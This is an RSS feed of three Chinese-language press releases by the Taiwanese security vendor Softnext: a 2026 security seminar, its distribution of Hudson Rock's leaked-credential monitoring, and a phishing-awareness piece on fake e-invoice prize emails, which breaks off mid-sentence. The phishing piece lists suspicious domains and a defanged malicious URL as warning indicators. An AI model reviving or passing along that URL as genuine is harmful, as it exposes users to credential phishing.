<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>台灣產經新聞網 符合關鍵字"中華數位科技" 最新訊息列表</title>
    <description>台灣產經新聞網 - Taiwan Business News 符合關鍵字「中華數位科技」 最新訊息列表</description>
    <link>https://news.taiwannet.com.tw/rss.aspx?listType=search&amp;key=%E4%B8%AD%E8%8F%AF%E6%95%B8%E4%BD%8D%E7%A7%91%E6%8A%80</link>
    <atom:link href="https://news.taiwannet.com.tw/rss.aspx?listType=search&amp;key=%E4%B8%AD%E8%8F%AF%E6%95%B8%E4%BD%8D%E7%A7%91%E6%8A%80" rel="self" type="application/rss+xml" />
    <item>
      <guid isPermaLink="false">BB18ABA3-DACF-4475-90B8-F15066970FE4</guid>
      <title>中華數位科技 2026 研討活動 - 在威脅擴大前，掌握資安防禦關鍵時差</title>
      <link>https://news.taiwannet.com.tw/news/197840/%E4%B8%AD%E8%8F%AF%E6%95%B8%E4%BD%8D%E7%A7%91%E6%8A%80-2026-%E7%A0%94%E8%A8%8E%E6%B4%BB%E5%8B%95-%E5%9C%A8%E5%A8%81%E8%84%85%E6%93%B4%E5%A4%A7%E5%89%8D-%E6%8E%8C%E6%8F%A1%E8%B3%87%E5%AE%89%E9%98%B2%E7%A6%A6%E9%97%9C%E9%8D%B5%E6%99%82%E5%B7%AE.html</link>
      <pubDate>Thu, 12 Mar 2026 10:23:38 +0800</pubDate>
      <dc:creator>中華數位科技</dc:creator>
      <category>科技新訊</category>
      <description><![CDATA[<img src="https://news.taiwannet.com.tw/images/user_uploaded/197840_42d7254c489b408caa4adf591e0bcfc1.jpg" border="0" style="max-width: 100%;"><p class="MsoNormal" style="mso-line-height-alt: 0pt;"><span style="font-family: '微軟正黑體',sans-serif;">資安攻防是一連串反應與速度的考驗，在攻擊手法不斷進化的環境中，能否在安全事態擴大前掌握關鍵時差進行即時阻斷，已成為企業防禦成敗的關鍵。</span></p>
<p class="MsoNormal" style="mso-line-height-alt: 0pt;"><span style="font-family: '微軟正黑體',sans-serif;">為了協助企業應對日益嚴峻的資安挑戰，<span lang="EN-US">Softnext </span>中華數位科技將於<span lang="EN-US"> 2026 </span>年<span lang="EN-US"> 4 </span>月在台北、新竹、台中、高雄等地，舉辦「在威脅擴大前，掌握資安防禦關鍵時差」研討活動。</span></p>
<p class="MsoNormal" style="mso-line-height-alt: 0pt;"><strong><span style="font-family: '微軟正黑體',sans-serif;">三大焦點議題：</span></strong></p>
<ul style="margin-top: 0cm;" type="disc">
<li class="MsoNormal" style="mso-line-height-alt: 0pt; mso-list: l0 level1 lfo1; tab-stops: list 36.0pt;"><span style="font-family: '微軟正黑體',sans-serif;"><span style="color: rgb(53, 152, 219);">縮短漏洞修補時差</span>：從實務情境出發，探討如何建立可控、可驗證的自動化修補流程，在駭客利用漏洞前先行阻斷風險。</span></li>
<li class="MsoNormal" style="mso-line-height-alt: 0pt; mso-list: l0 level1 lfo1; tab-stops: list 36.0pt;"><span lang="EN-US" style="font-family: 微軟正黑體, sans-serif; color: rgb(53, 152, 219);">AD </span><span style="font-family: '微軟正黑體',sans-serif;"><span style="color: rgb(53, 152, 219);">深度檢測與異動追蹤</span>：透過<span lang="EN-US"> Netwrix </span>自動化維運調好<span lang="EN-US"> AD </span>體質，將<span lang="EN-US"> IT </span>人員從重複、易出錯的稽核瑣事中解脫，精準追蹤異動並優化管理。</span></li>
<li class="MsoNormal" style="mso-line-height-alt: 0pt; mso-list: l0 level1 lfo1; tab-stops: list 36.0pt;"><span style="font-family: '微軟正黑體',sans-serif;"><span style="color: rgb(53, 152, 219);">【新品登場】暗網外洩憑證情資</span>：許多憑證外洩後並非立即被利用，而是先在暗網販售；透過<span lang="EN-US"> Hudson Rock Cavalier</span>的即時監控，讓企業能趕在駭客發動攻擊的「時差」內先行因應，阻斷初始入侵路徑。<span lang="EN-US"><br style="mso-special-character: line-break;"><!-- [if !supportLineBreakNewLine]--><!--[endif]--></span></span></li>
</ul>
<p class="MsoNormal" style="mso-line-height-alt: 0pt;"><span style="font-family: '微軟正黑體',sans-serif;">中華數位科技長期關注全球資安威脅發展趨勢，深知企業的資安需求不僅止於郵件安全。透過持續觀察並深入了解台灣企業實務上的資安需求，中華數位科技陸續引進多款國際資安大廠的防護產品，將防護範圍從郵件安全延伸至更全面的網路安全領域。</span></p>
<p class="MsoNormal" style="mso-line-height-alt: 0pt;"><span style="font-family: '微軟正黑體',sans-serif;">除了具備自主研發能力外，中華數位科技同時也是技術深厚的資安代理商。憑藉扎實的研發背景與長期累積的技術經驗，在協助企業面對資安問題時，能更快速判斷問題類型並提供在地技術支援，降低將問題轉交國外原廠處理所需的時間成本。同時，中華數位科技亦能針對企業在地應用情境進行加值開發，使國際資安產品更貼近台灣企業的實際使用需求，協助企業打造更完整的資安防護體系。</span></p>
<p class="MsoNormal" style="mso-line-height-alt: 0pt;"><span style="font-family: '微軟正黑體',sans-serif;">本次活動聚焦企業資安防護的三大關鍵面向：漏洞修補、<span lang="EN-US">AD </span>身份稽核，以及暗網外洩憑證情資監控。透過實務案例與國際資安技術分享，協助企業縮短威脅反應時差，在攻擊發生前提前偵測與阻斷潛在風險。</span></p>
<p class="MsoNormal" style="mso-line-height-alt: 0pt;"><span style="font-family: '微軟正黑體',sans-serif;">活動內容及報名資訊，請參考<span lang="EN-US">Softnext </span>中華數位「<a href="https://www.softnext.com.tw/event/202604seminar/"><span lang="EN-US">2026 </span>在威脅擴大前，掌握資安防禦關鍵時差</a>」活動網頁</span></p>]]></description>
    </item>
    <item>
      <guid isPermaLink="false">8B1BBADD-F274-49D9-AC15-EA3765CCAEE2</guid>
      <title>70% 勒索攻擊源於憑證外洩或帳號入侵   中華數位代理 Hudson Rock憑證外洩監測平台</title>
      <link>https://news.taiwannet.com.tw/news/198947/70-%E5%8B%92%E7%B4%A2%E6%94%BB%E6%93%8A%E6%BA%90%E6%96%BC%E6%86%91%E8%AD%89%E5%A4%96%E6%B4%A9%E6%88%96%E5%B8%B3%E8%99%9F%E5%85%A5%E4%BE%B5-%E4%B8%AD%E8%8F%AF%E6%95%B8%E4%BD%8D%E4%BB%A3%E7%90%86-hudson-rock%E6%86%91%E8%AD%89%E5%A4%96%E6%B4%A9%E7%9B%A3%E6%B8%AC%E5%B9%B3%E5%8F%B0.html</link>
      <pubDate>Thu, 19 Mar 2026 13:38:29 +0800</pubDate>
      <dc:creator>中華數位科技</dc:creator>
      <category>科技新訊</category>
      <description><![CDATA[<img src="https://news.taiwannet.com.tw/images/user_uploaded/198947_2deef425f04147f9ab4cacde6fa74ff3.jpg" border="0" style="max-width: 100%;"><p class="MsoNormal" style="margin-bottom: 0cm; mso-line-height-alt: 0pt;"><span style="font-size: 11.0pt; font-family: '微軟正黑體',sans-serif;">隨著<span lang="EN-US"> Infostealer </span></span><span style="font-size: 11.0pt; font-family: '微軟正黑體',sans-serif;">資訊竊取惡意軟體成為多數重大資安事件的關鍵起點，企業的憑證外洩風險正逐漸升高。中華數位科技日前正式成為以色列資安情資公司<span lang="EN-US">Hudson Rock</span>在台灣的代理商，將<span lang="EN-US">Hudson Rock</span>領先全球的<span lang="EN-US"> Infostealer </span>威脅情資平台代理引進台灣市場，協助企業在攻擊發生前，即時識別帳密外洩、端點感染與供應鏈資安風險。</span></p>
<p class="MsoNormal" style="margin-bottom: 0cm; mso-line-height-alt: 0pt;"><span style="font-size: 11.0pt; font-family: '微軟正黑體',sans-serif;">根據<span lang="EN-US"> Hudson Rock </span>與多家威脅情報機構的研究，超過<span lang="EN-US"> 70% </span>的勒索攻擊事件 是從憑證外洩或帳號入侵開始。即使企業已啟用多因素驗證（<span lang="EN-US">MFA</span>），攻擊者可透過竊取的使用者帳號、密碼、瀏覽器憑證、<span lang="EN-US">Session Cookie </span>與<span lang="EN-US"> Token</span>進行帳號接管、部署勒索軟體或竊取機敏資料，使企業防禦難度大幅提升。</span></p>
<p class="MsoNormal" style="margin-bottom: 0cm; mso-line-height-alt: 0pt;"><span lang="EN-US" style="font-size: 11.0pt; font-family: '微軟正黑體',sans-serif;">Hudson Rock&nbsp;</span><span style="mso-bookmark: _Hlk220426765;"><span style="font-size: 11.0pt; font-family: '微軟正黑體',sans-serif;">是一家專精於<span lang="EN-US"> Infostealer Intelligence </span>的國際資安情資公司。</span></span><span style="font-size: 11.0pt; font-family: '微軟正黑體',sans-serif;">長期追蹤全球實際遭<span lang="EN-US"> Infostealer </span>惡意竊資軟體感染的終端設備，擁有全球規模最大的<span lang="EN-US"> Infostealer </span>資料庫，涵蓋超過<span lang="EN-US"> 2.5 </span>億組被竊帳號與密碼、<span lang="EN-US">IP</span>、裝置與地理位置資訊，累積來自數千萬台受害裝置的第一手威脅資料。可幫助企業了解下列風險：</span></p>
<p class="MsoNormal" style="text-indent: -24.0pt; mso-line-height-alt: 0pt; mso-list: l0 level1 lfo1; margin: 0cm 0cm 0cm 24.0pt;"><!-- [if !supportLists]--><span lang="EN-US" style="font-size: 11.0pt; font-family: 'Arial',sans-serif; mso-fareast-font-family: Arial;"><span style="mso-list: Ignore;">&bull;<span style="font: 7.0pt 'Times New Roman';">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span></span></span><!--[endif]--><span style="font-size: 11.0pt; font-family: '微軟正黑體',sans-serif;">檢測公司網域是否出現在感染資料中</span></p>
<p class="MsoNormal" style="text-indent: -24.0pt; mso-line-height-alt: 0pt; mso-list: l0 level1 lfo1; margin: 0cm 0cm 0cm 24.0pt;"><!-- [if !supportLists]--><span lang="EN-US" style="font-size: 11.0pt; font-family: 'Arial',sans-serif; mso-fareast-font-family: Arial;"><span style="mso-list: Ignore;">&bull;<span style="font: 7.0pt 'Times New Roman';">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span></span></span><!--[endif]--><span style="font-size: 11.0pt; font-family: '微軟正黑體',sans-serif;">辨識員工、合作夥伴或供應鏈是否存在憑證外洩風險</span></p>
<p class="MsoNormal" style="text-indent: -24.0pt; mso-line-height-alt: 0pt; mso-list: l0 level1 lfo1; margin: 0cm 0cm 0cm 24.0pt;"><!-- [if !supportLists]--><span lang="EN-US" style="font-size: 11.0pt; font-family: 'Arial',sans-serif; mso-fareast-font-family: Arial;"><span style="mso-list: Ignore;">&bull;<span style="font: 7.0pt 'Times New Roman';">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span></span></span><!--[endif]--><span style="font-size: 11.0pt; font-family: '微軟正黑體',sans-serif;">透過攻擊者視角，模擬駭客如何鎖定企業進行滲透</span></p>
<p class="MsoNormal" style="margin-bottom: 0cm; mso-line-height-alt: 0pt;"><span lang="EN-US" style="font-size: 11.0pt; font-family: '微軟正黑體',sans-serif;">Hudson Rock </span><span style="mso-bookmark: _Hlk220422317;"><span style="font-size: 11.0pt; font-family: '微軟正黑體',sans-serif;">與一般威脅情資平台不同之處在於，直接從威脅行為者獲取情資。威脅行為者可分為兩類：</span></span></p>
<p class="MsoListParagraphCxSpFirst" style="mso-add-space: auto; text-indent: -24.0pt; mso-line-height-alt: 0pt; mso-list: l1 level1 lfo2; margin: 0cm 0cm 0cm 24.0pt;"><span style="mso-bookmark: _Hlk220422317;"><!-- [if !supportLists]--><span lang="EN-US" style="font-size: 11.0pt; font-family: Wingdings; mso-fareast-font-family: Wingdings; mso-bidi-font-family: Wingdings;"><span style="mso-list: Ignore;">l<span style="font: 7.0pt 'Times New Roman';">&nbsp;&nbsp; </span></span></span><!--[endif]--><span style="font-size: 11.0pt; font-family: '微軟正黑體',sans-serif;">第一類 執行資訊竊取攻擊者：傳播惡意竊資軟體<span lang="EN-US">(Spread Infostealer malware)</span>，盡可能感染更多電腦。攻擊活動結束，會將竊取的訊息出售給其他攻擊者。</span></span></p>
<p class="MsoListParagraphCxSpLast" style="mso-add-space: auto; text-indent: -24.0pt; mso-line-height-alt: 0pt; mso-list: l1 level1 lfo2; margin: 0cm 0cm 0cm 24.0pt;"><span style="mso-bookmark: _Hlk220422317;"><!-- [if !supportLists]--><span lang="EN-US" style="font-size: 11.0pt; font-family: Wingdings; mso-fareast-font-family: Wingdings; mso-bidi-font-family: Wingdings;"><span style="mso-list: Ignore;">l<span style="font: 7.0pt 'Times New Roman';">&nbsp;&nbsp; </span></span></span><!--[endif]--><span style="font-size: 11.0pt; font-family: '微軟正黑體',sans-serif;">第二類 攻擊執行者：購買竊取的資料，進行分析，並基於資訊竊取者<span lang="EN-US"> (Infostealer-originated) </span>提供的資訊發動實際的網路攻擊。</span></span></p>
<p class="MsoNormal" style="margin-bottom: 0cm; mso-line-height-alt: 0pt;"><span style="mso-bookmark: _Hlk220422317;"><span lang="EN-US" style="font-size: 11.0pt; font-family: '微軟正黑體',sans-serif;">Hudson Rock </span></span><span style="mso-bookmark: _Hlk220422317;"><span style="font-size: 11.0pt; font-family: '微軟正黑體',sans-serif;">團隊深入威脅行為者的活動鏈，直接從第一類威脅行為者取得最新資料，為企業爭取到關鍵救援時間。</span></span></p>
<p class="MsoNormal" style="margin-bottom: 0cm; mso-line-height-alt: 0pt;"><span style="mso-bookmark: _Hlk220422317;"><span lang="EN-US" style="font-size: 11.0pt; font-family: '微軟正黑體',sans-serif;">&nbsp;</span></span><span style="mso-bookmark: _Hlk220422317;"><strong><span lang="EN-US" style="font-size: 11.0pt; font-family: '微軟正黑體',sans-serif;">Hudson Rock </span></strong></span><span style="mso-bookmark: _Hlk220422317;"><strong><span style="font-size: 11.0pt; font-family: '微軟正黑體',sans-serif;">的 <span lang="EN-US">Cavalier </span>企業外洩憑證監控和通知平台</span></strong></span><strong><span style="font-size: 11.0pt; font-family: '微軟正黑體',sans-serif;">，</span></strong><span style="font-size: 11.0pt; font-family: '微軟正黑體',sans-serif;">可提供即時的帳密外洩警示，讓企業在駭客入侵前，就知道哪些帳號、<span lang="EN-US">IP </span>或端點曾被感染，並採取補救措施。</span></p>
<p class="MsoNormal" style="margin-bottom: 0cm; mso-line-height-alt: 0pt;"><span lang="EN-US" style="font-size: 11.0pt; font-family: '微軟正黑體',sans-serif; mso-no-proof: yes;"><img style="display: block; margin-left: auto; margin-right: auto;" src="https://news.taiwannet.com.tw/news/image/4b20b870f0424e64b3091b10a8d93256.jpg" width="611" height="267"><!--[endif]--></span></p>
<p class="MsoNormal" style="margin-bottom: 0cm; text-align: center; mso-line-height-alt: 0pt;" align="center"><span style="mso-bookmark: _Hlk220426126;"><span lang="EN-US" style="font-size: 10.0pt; font-family: '微軟正黑體',sans-serif; color: #7f7f7f; mso-themecolor: text1; mso-themetint: 128;">Hudson Rock </span></span><span style="mso-bookmark: _Hlk220426126;"><span style="font-size: 10.0pt; font-family: '微軟正黑體',sans-serif; color: #7f7f7f; mso-themecolor: text1; mso-themetint: 128;">資料獲取技術流程</span></span></p>
<p class="MsoNormal" style="margin-bottom: 0cm; text-align: center; mso-line-height-alt: 0pt;" align="center"><span style="mso-bookmark: _Hlk220426126;"><span lang="EN-US" style="font-size: 10.0pt; font-family: '微軟正黑體',sans-serif; color: #7f7f7f; mso-themecolor: text1; mso-themetint: 128;">&nbsp;</span></span></p>
<p class="MsoNormal" style="margin-bottom: 0cm; text-align: center; mso-line-height-alt: 0pt;" align="center"><span style="mso-bookmark: _Hlk220426126;"><span lang="EN-US" style="font-size: 11.0pt; font-family: '微軟正黑體',sans-serif; mso-no-proof: yes;"><!-- [if gte vml 1]><v:shape id="圖片_x0020_4" o:spid="_x0000_i1025" type="#_x0000_t75"
 style='width:306pt;height:189pt;visibility:visible;mso-wrap-style:square'>
 <v:imagedata src="file:///C:/Users/IvyChen/AppData/Local/Temp/msohtmlclip1/01/clip_image003.jpg"
  o:title=""/>
</v:shape><![endif]--><!-- [if !vml]--><img src="https://news.taiwannet.com.tw/news/image/4d2cd5dff5d8423f9f6197d7fbe073e8.jpg" width="523" height="323"><!--[endif]--></span></span></p>
<p class="MsoNormal" style="margin-bottom: 0cm; text-align: center; mso-line-height-alt: 0pt;" align="center"><span style="mso-bookmark: _Hlk220426126;"><span lang="EN-US" style="font-size: 10.0pt; font-family: '微軟正黑體',sans-serif; color: #7f7f7f; mso-themecolor: text1; mso-themetint: 128;">Hudson Rock Cavalier</span></span><span style="mso-bookmark: _Hlk220426126;"><span style="font-size: 10.0pt; font-family: '微軟正黑體',sans-serif; color: #7f7f7f; mso-themecolor: text1; mso-themetint: 128;">畫面示意</span></span></p>
<p class="MsoNormal" style="margin-bottom: 0cm; text-align: center; mso-line-height-alt: 0pt;" align="center"><span style="mso-bookmark: _Hlk220426126;"><span lang="EN-US" style="font-size: 11.0pt; font-family: '微軟正黑體',sans-serif;">&nbsp;</span></span><span style="font-size: 11.0pt; font-family: '微軟正黑體',sans-serif;">了解<span lang="EN-US"> Hudson Rock</span>如何協助掌握企業憑證的真實曝險風險，請參考<a href="https://www.softnext.com.tw/products/hudsonrock.html">網頁資訊</a></span><span lang="EN-US" style="font-size: 10.0pt; font-family: '微軟正黑體',sans-serif;">( </span><span lang="EN-US"><a href="https://www.softnext.com.tw/products/hudsonrock.html"><span style="font-size: 10.0pt; font-family: '微軟正黑體',sans-serif;">https://www.softnext.com.tw/products/hudsonrock.html</span></a></span><span lang="EN-US" style="font-size: 10.0pt; font-family: '微軟正黑體',sans-serif;"> )</span><span style="font-size: 11.0pt; font-family: '微軟正黑體',sans-serif;">，或與中華數位科技聯繫<span lang="EN-US"> 02-25422526</span>。</span></p>
<p class="MsoNormal" style="margin-bottom: 0cm; mso-line-height-alt: 0pt;"><span lang="EN-US" style="font-size: 11.0pt; font-family: '微軟正黑體',sans-serif;">Hudson Rock&nbsp;</span><span style="mso-bookmark: _Hlk220424595;"><span style="font-size: 11.0pt; font-family: '微軟正黑體',sans-serif;">是專注於 「<span lang="EN-US">Infostealer Intelligence</span>資訊竊取惡意軟體情資」與「企業憑證洩漏分析」的網路威脅情資公司，幫助企業和安全團隊領先於不斷演變的威脅。憑藉其不斷擴展的受感染電腦網路犯罪情資的資料庫，<span lang="EN-US">Hudson Rock </span>提供可操作的情資和警報，協助企業保護員工、客戶和基礎設施免受網路犯罪分子的侵害。企業無論需要防範帳戶盜用、勒索軟體或資料洩露，<span lang="EN-US">Hudson Rock </span>的<span lang="EN-US">Cavalier</span>企業外洩憑證監控和通知平台都能提供企業所需的工具，保障公司的營運安全。</span></span></p>
<p class="MsoNormal" style="margin-bottom: 0cm; mso-line-height-alt: 0pt;"><span style="font-size: 11.0pt; font-family: '微軟正黑體',sans-serif;">中華數位科技致力於郵件安全技術研發與開發，長期關注資安威脅發展趨勢，深知企業的資安需求不僅止於郵件安全。透過持續觀察並深入了解台灣企業實務上的資安需求，中華數位科技陸續引進多款國際資安大廠的防護產品，將防護範圍從郵件安全延伸至更全面的網路安全領域。</span></p>
<p class="MsoNormal" style="margin-bottom: 0cm; mso-line-height-alt: 0pt;"><span style="font-size: 11.0pt; font-family: '微軟正黑體',sans-serif;">除了具備自主研發能力，中華數位科技同時也是技術深厚的資安代理商。憑藉扎實的研發背景與長期累積的技術經驗，在協助企業面對資安問題時，能更快速判斷問題類型並提供在地技術支援，降低將問題轉交國外原廠處理所需的時間成本。同時，中華數位科技亦能針對企業在地應用情境進行加值開發，使國際資安產品更貼近台灣企業的實際使用需求，協助企業打造更完整的資安防護體系。</span></p>]]></description>
    </item>
    <item>
      <guid isPermaLink="false">475DDDC9-96B8-4F57-BC45-552200C20E70</guid>
      <title>連假後「雲端發票中獎通知」激增，小心社交工程與網路釣魚攻擊！</title>
      <link>https://news.taiwannet.com.tw/news/201010/%E9%80%A3%E5%81%87%E5%BE%8C-%E9%9B%B2%E7%AB%AF%E7%99%BC%E7%A5%A8%E4%B8%AD%E7%8D%8E%E9%80%9A%E7%9F%A5-%E6%BF%80%E5%A2%9E-%E5%B0%8F%E5%BF%83%E7%A4%BE%E4%BA%A4%E5%B7%A5%E7%A8%8B%E8%88%87%E7%B6%B2%E8%B7%AF%E9%87%A3%E9%AD%9A%E6%94%BB%E6%93%8A%EF%BC%81.html</link>
      <pubDate>Wed, 08 Apr 2026 16:10:06 +0800</pubDate>
      <dc:creator>中華數位科技</dc:creator>
      <category>科技新訊</category>
      <description><![CDATA[<img src="https://news.taiwannet.com.tw/images/user_uploaded/201010_59fee724fd71422f9456107c894c7298.jpg" border="0" style="max-width: 100%;"><p class="MsoNormal"><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">四月的連續假期剛結束，當大眾正處於重返工作崗位的適應期時，往往是防備心較弱的時刻。詐騙集團利用此心理弱點，結合「發票中獎」等帶有利益誘惑的社交工程（</span><span lang="EN-US">Social Engineering</span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">）手法，發動大規模的網路釣魚（</span><span lang="EN-US">Phishing</span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">）攻擊。</span></p>
<p class="MsoNormal"><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">近期，中華數位科技與</span><span lang="EN-US"> ASRC </span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">研究中心發現主旨為「雲端發票中獎通知」的電子郵件大量爆發。先別急著高興，冷靜檢視訊息內容，就能透過以下四個明顯的「威脅特徵」來識破這場騙局：</span></p>
<p class="MsoNormal"><strong><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">破綻一：寄件者網域與宣稱單位不符</span></strong></p>
<p class="MsoNormal"><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">收到中獎通知時，首要步驟是展開「寄件者」的詳細資訊，檢視真實的電子郵件地址。攻擊者通常會將顯示名稱竄改為「財政部電子發票整合服務平台」，但背後的實際發信地址卻是無關的信箱，或遭到駭客入侵的跳板網域。政府機關的正式公務信件，網域必定具備官方的一致性</span><span lang="EN-US">(</span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">例如：</span><span lang="EN-US">gov.tw</span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">結尾</span><span lang="EN-US">)</span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">。</span></p>
<p class="MsoNormal"><strong><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">破綻二：異常的發信主機與關聯網域活動</span></strong></p>
<p class="MsoNormal"><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">若進一步檢視電子郵件的原始資訊（如郵件標頭</span><span lang="EN-US"> Header</span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">）或網路連線紀錄，會發現這類釣魚信件的發送來源與關聯網域極度異常。例如，在此次攻擊活動中，發現了</span><span lang="EN-US"> tikoet.com</span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">（偽造國外知名旅遊平台的錯字網域）以及</span><span lang="EN-US"> info-yuyan.com </span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">等不明網域的蹤跡。這些網域通常被駭客用作發信跳板或惡意流量重導向（</span><span lang="EN-US">Redirector</span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">）的中繼站。一封台灣財政部的通知信，其底層傳輸卻關聯這些境外或免洗網域，是不合邏輯且極具風險的。</span></p>
<p class="MsoNormal"><strong><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">破綻三：利用短網址技術進行防護規避</span></strong></p>
<p class="MsoNormal"><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">為了繞過企業的電子郵件安全閘道與掩飾真實的惡意連結，攻擊者會在信件中使用如</span> <strong><span lang="EN-US">TinyURL</span></strong> <span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">等縮址服務。這是一種常見的網址混淆技術（</span><span lang="EN-US">Obfuscation</span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">）。政府機關發送重要通知時，基於資訊透明與安全性考量，原則上會直接提供完整的官方網址，極少要求民眾點擊來源不明的短網址。</span></p>
<p class="MsoNormal"><strong><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">破綻四：錯字網域（</span><span lang="EN-US">Typosquatting</span></strong><strong><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">）與偽造政府層級</span></strong></p>
<p class="MsoNormal"><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">若使用者不慎點擊了短網址，流量在經過中繼站後，最終會被導向類似下方的惡意網址：</span><span lang="EN-US"> hxxps://gov.einvioce.com.tw/menghuan.html?c=aHR0cHM6Ly9nb3YuZWludmlvY2UuY29tLnR3Lw==</span></p>
<p class="MsoNormal"><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">在我們進行調查的時間點，這個網頁已經關閉，但網址本身暗藏了兩個高階的欺騙手法：</span></p>
<ol style="margin-top: 0cm;" start="1" type="1">
<li class="MsoNormal" style="mso-list: l0 level1 lfo1; tab-stops: list 36.0pt;"><strong><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">偽造政府網域層級：</span></strong> <span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">台灣政府單位的官方網站，其頂級網域（</span><span lang="EN-US">TLD</span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">）必定是</span> <strong><span lang="EN-US">.gov.tw</span></strong><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">。該釣魚網址的結尾是</span><span lang="EN-US"> .com.tw</span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">（一般商業註冊），攻擊者只是刻意在最前面加上了</span><span lang="EN-US"> 